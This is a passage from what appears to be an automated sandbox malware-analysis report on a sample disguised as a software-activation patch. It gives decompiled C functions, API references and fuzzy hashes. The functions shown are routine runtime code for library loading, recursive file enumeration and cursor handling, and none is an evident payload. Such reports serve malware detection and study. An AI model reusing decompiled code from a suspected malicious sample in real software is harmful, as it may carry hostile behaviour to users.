						return 1;
					} else {
						goto L2;
					}
				}
			}

0x0042efe6
0x0042effd
0x0042f001
0x0042f00a
0x0042f00e
0x0042f003
0x0042f003
0x0042f008
0x0042f013
0x00000000
0x00000000
0x00000000
0x0042f008

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EF60), ref: 0042EFF2
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EFF8

Strings

ShutdownBlockReasonDestroy, xrefs: 0042EFE8
user32.dll, xrefs: 0042EFED

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: e8811ed0a627a4e133d1dc9a4b4f14b5e47b32fb59af0e63981d665b4b5d3b09
Instruction ID: d167ebeb3a0c78ffef62d304a6593c01274f0b6b7e47665dfbb0b7c0d901300f
Opcode Fuzzy Hash: e8811ed0a627a4e133d1dc9a4b4f14b5e47b32fb59af0e63981d665b4b5d3b09
Instruction Fuzzy Hash: 68D0C792712732576A5035F53CC1AAB429CC9156AE3D40077FA40E6143D95DCC1926AC

Uniqueness

Uniqueness Score: -1.00%

Function 0044FDB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044FDB0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _t6;
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __esi;
				_t11 = __edi;
				_t10 = __edx;
				_t9 = __ecx;
				_t8 = __ebx;
				E00404A2C(0x49c9c8);
				if( *0x49e034 == 0) {
					_t7 =  *0x49e020; // 0x44fd7c
					 *0x49e788 = _t7;
					 *0x49e020 = E0044FD7C;
				}
				E0044FD40();
				E0044BBBC(_t8, _t9, _t10, _t11, _t12);
				_t6 = GetProcAddress(GetModuleHandleA("user32.dll"), "NotifyWinEvent");
				 *0x49e774 = _t6;
				return _t6;
			}

0x0044fdb0
0x0044fdb0
0x0044fdb0
0x0044fdb0
0x0044fdb0
0x0044fdb5
0x0044fdc1
0x0044fdc3
0x0044fdc8
0x0044fdcd
0x0044fdcd
0x0044fdd7
0x0044fddc
0x0044fdf1
0x0044fdf6
0x0044fdfb

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0049BA76), ref: 0044FDEB
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044FDF1

Strings

NotifyWinEvent, xrefs: 0044FDE1
user32.dll, xrefs: 0044FDE6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1646373207-597752486
Opcode ID: 5908743018cfd2f6cefc4491aa27570e9f34bc63df026fe54f1bbb87c612bb86
Instruction ID: 223032890b7009ceba89b3f881feb785258270d151d072d0a62a9436c582bc8a
Opcode Fuzzy Hash: 5908743018cfd2f6cefc4491aa27570e9f34bc63df026fe54f1bbb87c612bb86
Instruction Fuzzy Hash: 4FE012F0D417509AFB00FBB79846B093AE0D76471CB10107FF541A6653DBBC54588B1E

Uniqueness

Uniqueness Score: -1.00%

Function 0049B7EC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0049B7EC() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("user32.dll"), "DisableProcessWindowsGhosting");
				if(_t2 != 0) {
					return  *_t2();
				}
				return _t2;
			}

0x0049b7fc
0x0049b803
0x00000000
0x0049b805
0x0049b807

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049BACC,00000001,00000000,0049BAF0), ref: 0049B7F6
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049B7FC

Strings

DisableProcessWindowsGhosting, xrefs: 0049B7EC
user32.dll, xrefs: 0049B7F1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 9ab8e43da6454e8868478a7b9e10f81f4b0d0e94fccef25b277911ace8fae704
Instruction ID: 54119c6ef0f49054147f19105d5d020da2821b8521f233d32c589f61db0a4d0d
Opcode Fuzzy Hash: 9ab8e43da6454e8868478a7b9e10f81f4b0d0e94fccef25b277911ace8fae704
Instruction Fuzzy Hash: E5B09280681A01509C00B2B22E02A6B080CCC887997240037B400B00C6CF6C844504BD

Uniqueness

Uniqueness Score: -1.00%

Function 0047F8B0 Relevance: 6.2, APIs: 4, Instructions: 195
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E0047F8B0(char __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				char _v17;
				signed int _v24;
				char _v28;
				void* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v356;
				char _v360;
				intOrPtr _t96;
				signed int _t112;
				int _t115;
				signed int _t132;
				signed char _t134;
				int _t137;
				intOrPtr _t177;
				intOrPtr _t189;
				intOrPtr _t193;
				void* _t202;
				void* _t203;
				intOrPtr _t204;

				_t200 = __esi;
				_t199 = __edi;
				_t202 = _t203;
				_t204 = _t203 + 0xfffffe9c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v24 = 0;
				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t202);
				_push(0x47fb79);
				_push( *[fs:eax]);
				 *[fs:eax] = _t204;
				_push(_v12);
				_push(_v16);
				_push(_a12);
				E00403634();
				_v17 = 1;
				_t162 =  &_v352;
				_v32 = E00453238(_v5,  &_v352, _v24, __eflags);
				if(_v32 == 0xffffffff) {
					_t96 = _a4;
					__eflags =  *(_t96 + 0x50) & 0x00000020;
					if(( *(_t96 + 0x50) & 0x00000020) == 0) {
						goto L21;
					} else {
						E00403494( &_v356, _v12);
						E0040357C( &_v356, _v16);
						E0040357C( &_v356, 0x47fb94);
						_v32 = E00453238(_v5,  &_v352, _v356, __eflags);
						__eflags = _v32 - 0xffffffff;
						if(_v32 == 0xffffffff) {
							goto L21;
						} else {
							__eflags = 0;
							_push(_t202);
							_push(0x47fb47);
							_push( *[fs:eax]);
							 *[fs:eax] = _t204;
							do {
								_t112 = E0047F860( &_v352);
								__eflags = _t112;
								if(_t112 == 0) {
									goto L19;
								} else {
									E00403494( &_v356, _v16);
									E0040355C( &_v360, 0x104,  &(_v352.cFileName));
									E0040357C( &_v356, _v360);
									E0040357C( &_v356, 0x47fba0);
									_t132 = E0047F8B0(_v5, 0, _v356, _v12, _t199, _t200, __eflags, _a4, _a8, _a12, _a16);
									__eflags = _t132;
									if(_t132 != 0) {
										goto L19;
									} else {
										_v17 = 0;
										E004031BC();
										goto L21;
									}
								}
								goto L22;
								L19:
								_t115 = FindNextFileA(_v32,  &_v352);
								__eflags = _t115;
							} while (_t115 != 0);
							__eflags = 0;
							_pop(_t189);
							 *[fs:eax] = _t189;
							_push(0x47fb4e);
							return FindClose(_v32);
						}
					}
				} else {
					_push(_t202);
					_push(0x47fa24);
					_push( *[fs:edx]);
					 *[fs:edx] = _t204;
					do {
						_t134 = _v352.dwFileAttributes;
						if((_t134 & 0x00000010) != 0 || _a8 != 0 && (_t134 & 0x00000002) != 0) {
							goto L11;
						} else {
							E0047E4A8( *((intOrPtr*)(_a4 + 4)), _t162,  &_v28);
							if(( *(_a4 + 0x4f) & 0x00000010) != 0) {
								__eflags = _v16;
								if(_v16 != 0) {
									E0042CDE4(_v28, _t162,  &_v356);
									_push(_v356);
									_push(_v16);
									E0042CDBC(_v28, _t162,  &_v360);
									_push(_v360);
									E00403634();
								}
							} else {
								_push(_v28);
								_push(_v16);
								E0040355C( &_v356, 0x104,  &(_v352.cFileName));
								_push(_v356);
								E00403634();
							}
							_t47 = _a16 - 4; // 0xc3fff836
							_t49 = _a16 + 8; // 0x5e5ff345
							_t162 =  *_t49;
							if( *((intOrPtr*)( *_t47))() != 0) {
								goto L11;
							} else {
								_v17 = 0;
								E004031BC();
								L21:
								_pop(_t177);
								 *[fs:eax] = _t177;
								_push(0x47fb80);
								E00403420( &_v360, 2);
								return E00403420( &_v28, 2);
							}
						}
						goto L22;
						L11:
						_t137 = FindNextFileA(_v32,  &_v352);
						__eflags = _t137;
					} while (_t137 != 0);
					__eflags = 0;
					_pop(_t193);
					 *[fs:eax] = _t193;
					_push(0x47fa2b);
					return FindClose(_v32);
				}
				L22:
			}

0x0047f8b0
0x0047f8b0
0x0047f8b1
0x0047f8b3
0x0047f8b9
0x0047f8ba
0x0047f8bb
0x0047f8be
0x0047f8c4
0x0047f8ca
0x0047f8cd
0x0047f8d0
0x0047f8d3
0x0047f8d6
0x0047f8db
0x0047f8dc
0x0047f8e1
0x0047f8e4
0x0047f8e7
0x0047f8ea
0x0047f8ed
0x0047f8f8
0x0047f8fd
0x0047f901
0x0047f912
0x0047f919
0x0047fa2b
0x0047fa2e
0x0047fa32
0x00000000
0x0047fa38
0x0047fa41
0x0047fa4f
0x0047fa5f
0x0047fa78
0x0047fa7b
0x0047fa7f
0x00000000
0x0047fa85
0x0047fa85
0x0047fa87
0x0047fa88
0x0047fa8d
0x0047fa90
0x0047fa93
0x0047fa99
0x0047fa9e
0x0047faa0
0x00000000
0x0047faa2
0x0047fabb
0x0047fad1
0x0047fae2
0x0047faf2
0x0047fb03
0x0047fb09
0x0047fb0b
0x00000000
0x0047fb0d
0x0047fb0d
0x0047fb11
0x00000000
0x0047fb11
0x0047fb0b
0x00000000
0x0047fb18
0x0047fb23
0x0047fb28
0x0047fb28
0x0047fb30
0x0047fb32
0x0047fb35
0x0047fb38
0x0047fb46
0x0047fb46
0x0047fa7f
0x0047f91f
0x0047f921
0x0047f922
0x0047f927
0x0047f92a
0x0047f92d
0x0047f92d
0x0047f935
0x00000000
0x0047f949
0x0047f952
0x0047f95e
0x0047f991
0x0047f995
0x0047f9a0
0x0047f9a5
0x0047f9ab
0x0047f9b7
0x0047f9bc
0x0047f9ca
0x0047f9ca
0x0047f960
0x0047f960
0x0047f963
0x0047f977
0x0047f97c
0x0047f98a
0x0047f98a
0x0047f9d2
0x0047f9d8
0x0047f9d8
0x0047f9e5
0x00000000
0x0047f9e7
0x0047f9e7
0x0047f9eb
0x0047fb4e
0x0047fb50
0x0047fb53
0x0047fb56
0x0047fb66
0x0047fb78
0x0047fb78
0x0047f9e5
0x00000000
0x0047f9f5
0x0047fa00
0x0047fa05
0x0047fa05
0x0047fa0d
0x0047fa0f
0x0047fa12
0x0047fa15
0x0047fa23
0x0047fa23
0x00000000

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0047FA24,?,?,?,?,00000000,0047FB79,?,?,?,00000000,?,0047FC88), ref: 0047FA00
FindClose.KERNEL32(000000FF,0047FA2B,0047FA24,?,?,?,?,00000000,0047FB79,?,?,?,00000000,?,0047FC88,00000000), ref: 0047FA1E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 9ad368ceea0c877d9926537a5f80a4e66bde3027648d760cd52d5e859b456359
Instruction ID: a2492a823a8cbc0112e5e27725a6df3c9536d0a8ebd69a23b4f87c8590b3ed18
Opcode Fuzzy Hash: 9ad368ceea0c877d9926537a5f80a4e66bde3027648d760cd52d5e859b456359
Instruction Fuzzy Hash: AE814F7090024DAFCF11DFA5CC51AEFBBB8EB49304F5080BAE508A7291D7399A4ACF55

Uniqueness

Uniqueness Score: -1.00%

Function 00481F4C Relevance: 6.1, APIs: 4, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00481F4C(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, char _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				struct _WIN32_FIND_DATAA _v344;
				char _v348;
				char _v352;
				void* _t79;
				signed char _t103;
				void* _t115;
				intOrPtr _t129;
				intOrPtr _t141;
				void* _t144;
				intOrPtr* _t146;
				void* _t148;
				void* _t149;
				intOrPtr _t150;

				_t148 = _t149;
				_t150 = _t149 + 0xfffffea4;
				_v348 = 0;
				_v352 = 0;
				_v12 = 0;
				_v8 = __ecx;
				_t144 = __edx;
				_t115 = __eax;
				_t146 = _a4;
				_push(_t148);
				_push(0x482145);
				_push( *[fs:eax]);
				 *[fs:eax] = _t150;
				_push(__edx);
				_push(_v8);
				_push(_a16);
				E00403634();
				 *((intOrPtr*)(_t146 + 4)) = 0;
				 *_t146 = 0;
				_v16 = E00453238(__eax,  &_v344, _v12, __eflags);
				if(_v16 != 0xffffffff) {
					do {
						_t103 = _v344.dwFileAttributes;
						if((_t103 & 0x00000010) == 0) {
							if(_a12 == 0) {
								L4:
								_v20 = _v344.nFileSizeHigh;
								_v24 = _v344.nFileSizeLow;
								E004310AC(_t146,  &_v24, _t155);
							} else {
								_t155 = _t103 & 0x00000002;
								if((_t103 & 0x00000002) == 0) {
									goto L4;
								}
							}
						}
					} while (FindNextFileA(_v16,  &_v344) != 0);
					FindClose(_v16);
				}
				_t157 = _a8;
				if(_a8 == 0) {
					L14:
					__eflags = 0;
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(E0048214C);
					E00403420( &_v352, 2);
					return E00403400( &_v12);
				} else {
					E00403494( &_v348, _t144);
					E0040357C( &_v348, _v8);
					E0040357C( &_v348, 0x482160);
					_v16 = E00453238(_t115,  &_v344, _v348, _t157);
					if(_v16 == 0xffffffff) {
						goto L14;
					} else {
						_push(_t148);
						_push(0x482118);
						_push( *[fs:eax]);
						 *[fs:eax] = _t150;
						do {
							_t79 = E0047F860( &_v344);
							_t160 = _t79;
							if(_t79 != 0) {
								E00403494( &_v348, _v8);
								E0040355C( &_v352, 0x104,  &(_v344.cFileName));
								E0040357C( &_v348, _v352);
								E0040357C( &_v348, 0x48216c);
								E00481F4C(_t115, _t115, _v348, _t144, _t144, _t146, _t160,  &_v24, _a8, _a12, _a16, _a20);
								E004310AC(_t146,  &_v24, _t160);
							}
						} while (FindNextFileA(_v16,  &_v344) != 0);
						_pop(_t141);
						 *[fs:eax] = _t141;
						_push(E0048211F);
						return FindClose(_v16);
					}
				}
			}

0x00481f4d
0x00481f4f
0x00481f5a
0x00481f60
0x00481f66
0x00481f69
0x00481f6c
0x00481f6e
0x00481f70
0x00481f75
0x00481f76
0x00481f7b
0x00481f7e
0x00481f81
0x00481f82
0x00481f85
0x00481f90
0x00481f97
0x00481f9c
0x00481fae
0x00481fb5
0x00481fb7
0x00481fb7
0x00481fbf
0x00481fc5
0x00481fcb
0x00481fd1
0x00481fda
0x00481fe2
0x00481fc7
0x00481fc7
0x00481fc9
0x00000000
0x00000000
0x00481fc9
0x00481fc5
0x00481ff7
0x00481fff
0x00481fff
0x00482004
0x00482008
0x0048211f
0x0048211f
0x00482121
0x00482124
0x00482127
0x00482137
0x00482144
0x0048200e
0x00482016
0x00482024
0x00482034
0x0048204c
0x00482053
0x00000000
0x00482059
0x0048205b
0x0048205c
0x00482061
0x00482064
0x00482067
0x0048206d
0x00482072
0x00482074
0x00482093
0x004820a9
0x004820ba
0x004820ca
0x004820d9
0x004820e4
0x004820e4
0x004820f9
0x00482103
0x00482106
0x00482109
0x00482117
0x00482117
0x00482053

APIs

FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,00482145,?,00000000,00000000,?,?,00483497,?,?,00000000), ref: 00481FF2
FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,00482145,?,00000000,00000000,?,?,00483497,?,?), ref: 00481FFF
FindNextFileA.KERNEL32(000000FF,?,00000000,00482118,?,?,?,?,00000000,00482145,?,00000000,00000000,?,?,00483497), ref: 004820F4
FindClose.KERNEL32(000000FF,0048211F,00482118,?,?,?,?,00000000,00482145,?,00000000,00000000,?,?,00483497,?), ref: 00482112

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: be6ad9d2a8f964023a2a96152d1b99d0eb4f567829eb4774c7009b24f520566a
Instruction ID: 08b9d9e684fed8dea23f8f184a6a28fa9329586f58159be8e4499552dc0984e9
Opcode Fuzzy Hash: be6ad9d2a8f964023a2a96152d1b99d0eb4f567829eb4774c7009b24f520566a
Instruction Fuzzy Hash: A8518F70A00648AFCB11EFA5CD45ADEB7B8EB49315F1084AAA908F7351D7389F85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00414188 Relevance: 6.1, APIs: 4, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00414188(intOrPtr* __eax, void* __ecx, signed int __edx) {
				intOrPtr* _t20;
				intOrPtr _t22;
				struct HICON__* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t28;
				struct HWND__* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr _t43;
				struct HWND__* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr* _t54;
				void* _t62;
				void* _t71;
				intOrPtr _t72;
				intOrPtr* _t73;
				void* _t79;

				_push(__ecx);
				_t54 = __eax;
				if( *0x49e5fc != 0) {
					L3:
					if( *0x49e5fc == 0) {
						_t78 =  *0x49e600;
						if( *0x49e600 != 0) {
							_t43 =  *0x49e5ec; // 0x0
							_t44 = GetDesktopWindow();
							_t45 =  *0x49e600; // 0x0
							E004191F8(_t45, _t44, _t78, _t43);
						}
					}
					 *0x49e5fc = 1;
					_t72 = E00414130(_t54, _t73);
					_t79 = _t72 -  *0x49e5dc; // 0x0
					if(_t79 != 0) {
						E00414154(1);
						 *0x49e5dc = _t72;
						 *0x49e5e0 =  *_t73;
						 *0x49e5f0 =  *_t54;
						 *0x49e5f4 =  *((intOrPtr*)(_t54 + 4));
						E00414154(0);
					}
					 *0x49e5f0 =  *_t54;
					 *0x49e5f4 =  *((intOrPtr*)(_t54 + 4));
					_t62 = E00414154(2);
					_t20 =  *0x49e5d4; // 0x0
					_t71 =  *((intOrPtr*)( *_t20 + 4))( *((intOrPtr*)(_t54 + 4)));
					if( *0x49e600 == 0) {
						_t22 =  *0x49e630; // 0x2250660
						_t24 = SetCursor(E004237FC(_t22, _t71));
					} else {
						if(_t72 == 0 || ( *(_t72 + 0x35) & 0x00000020) != 0) {
							_t25 =  *0x49e600; // 0x0
							E004191A4(_t25, _t71);
							_t27 =  *0x49e600; // 0x0
							_t84 =  *((char*)(_t27 + 0x44));
							if( *((char*)(_t27 + 0x44)) != 0) {
								_t28 =  *0x49e600; // 0x0
								_t24 = E004192DC(_t28,  *((intOrPtr*)(_t54 + 4)),  *_t54, __eflags);
							} else {
								_t30 = GetDesktopWindow();
								_t31 =  *0x49e600; // 0x0
								_t24 = E004191F8(_t31, _t30, _t84,  *((intOrPtr*)(_t54 + 4)));
							}
						} else {
							_t32 =  *0x49e600; // 0x0
							E00419350(_t32, _t62, __eflags);
							_t34 =  *0x49e630; // 0x2250660
							_t24 = SetCursor(E004237FC(_t34, _t71));
						}
					}
					L16:
					return _t24;
				}
				_t47 =  *0x49e5e8; // 0x0
				asm("cdq");
				if((_t47 -  *__eax ^ __edx) - __edx >= 5) {
					goto L3;
				}
				_t51 =  *0x49e5ec; // 0x0
				asm("cdq");
				_t24 = (_t51 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				if(_t24 < 5) {
					goto L16;
				}
				goto L3;
			}

0x0041418b
0x0041418c
0x00414195
0x004141be
0x004141c5
0x004141c7
0x004141ce
0x004141d0
0x004141d6
0x004141e3
0x004141e8
0x004141e8
0x004141ce
0x004141ed
0x004141fd
0x004141ff
0x00414205
0x00414209
0x0041420e
0x00414217
0x0041421e
0x00414227
0x0041422f
0x0041422f
0x00414236
0x0041423f
0x00414250
0x00414254
0x0041425e
0x00414267
0x004142d6
0x004142e1
0x00414269
0x0041426b
0x00414275
0x0041427a
0x0041427f
0x00414284
0x00414288
0x004142a8
0x004142ad
0x0041428a
0x0041428e
0x00414297
0x0041429c
0x0041429c
0x004142b4
0x004142b4
0x004142b9
0x004142c1
0x004142cc
0x004142cc
0x0041426b
0x004142e6
0x004142ea
0x004142ea
0x00414197
0x0041419e
0x004141a6
0x00000000
0x00000000
0x004141a8
0x004141b0
0x004141b3
0x004141b8
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 004141D6
GetDesktopWindow.USER32 ref: 0041428E

Part of subcall function 00419350: 6FB0B5E0.COMCTL32(?,00000000,00414453,00000000,00414563,?,?,0049E62C), ref: 0041936C
Part of subcall function 00419350: ShowCursor.USER32(00000001,?,00000000,00414453,00000000,00414563,?,?,0049E62C), ref: 00419389

SetCursor.USER32(00000000,?,?,?,?,00413F83,00000000,00413F96), ref: 004142CC

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: 8cfee51e6bd22bc240f75105183b6b05eca44474532d8ed2e66bef73f0c2bade
Instruction ID: 19a59601e3d98a3dbb13d851837e3bb0d350916c882c7f1eea00ba3daa39fbf9
Opcode Fuzzy Hash: 8cfee51e6bd22bc240f75105183b6b05eca44474532d8ed2e66bef73f0c2bade
Instruction Fuzzy Hash: 1B414C74600161EFCB10EF6AE988B9637E1ABA5318B4588BBF414CB365D738DC81CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00408EE4 Relevance: 6.1, APIs: 4, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408EE4(intOrPtr* __eax, void* __edx, void* __eflags) {
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char* _v304;
				char _v308;
				char _v312;
				char _v568;
				char _v632;
				char _v636;
				char _v696;
				void* __edi;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t38;
				struct HINSTANCE__* _t49;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t75;
				void* _t76;

				_t75 = __edx;
				_t74 = __eax;
				_t29 =  *0x49e014; // 0x400000
				GetModuleFileNameA(_t29,  &_v568, 0x100);
				E0040780C(_t76, 0x3f, E00407950( &_v568, 0x5c) + 1);
				_t62 = 0x409060;
				_t73 = 0x409060;
				if(E00402BA0(_t74, 0x406890) != 0) {
					_t62 = E00403738( *((intOrPtr*)(_t74 + 4)));
					_t61 = E00407750(_t62, 0x409060);
					if(_t61 != 0 &&  *((char*)(_t62 + _t61 - 1)) != 0x2e) {
						_t73 = 0x409064;
					}
				}
				_t38 =  *0x49e014; // 0x400000
				LoadStringA(_t38, 0xff9e,  &_v632, 0x40);
				E00402AA0( *_t74,  &_v272);
				_v312 =  &_v272;
				_v308 = 4;
				_v304 =  &_v696;
				_v300 = 6;
				_v296 = E00408ED8(_t75);
				_v292 = 5;
				_v288 = _t62;
				_v284 = 6;
				_v280 = _t73;
				_v276 = 6;
				E00407D50( &_v568,  &_v312,  &_v632, 4);
				_t49 =  *0x49e014; // 0x400000
				LoadStringA(_t49, 0xff9f,  &_v636, 0x40);
				if( *0x49e035 == 0) {
					return MessageBoxA(0,  &_v568,  &_v632, 0x2010);
				} else {
					E0040500C(0x49e208,  &_v568);
					return E00402708(E00404F8F(),  &_v312,  &_v568);
				}
			}

0x00408eee
0x00408ef0
0x00408eff
0x00408f05
0x00408f22
0x00408f27
0x00408f2c
0x00408f3f
0x00408f49
0x00408f4d
0x00408f54
0x00408f5d
0x00408f5d
0x00408f54
0x00408f6e
0x00408f74
0x00408f84
0x00408f90
0x00408f97
0x00408fa3
0x00408faa
0x00408fb9
0x00408fc0
0x00408fc8
0x00408fcf
0x00408fd7
0x00408fde
0x00408ff8
0x00409009
0x0040900f
0x0040901b
0x00000000
0x0040901d
0x00409029
0x00000000
0x00409033

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408F05
LoadStringA.USER32 ref: 00408F74
LoadStringA.USER32 ref: 0040900F
MessageBoxA.USER32 ref: 0040904E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

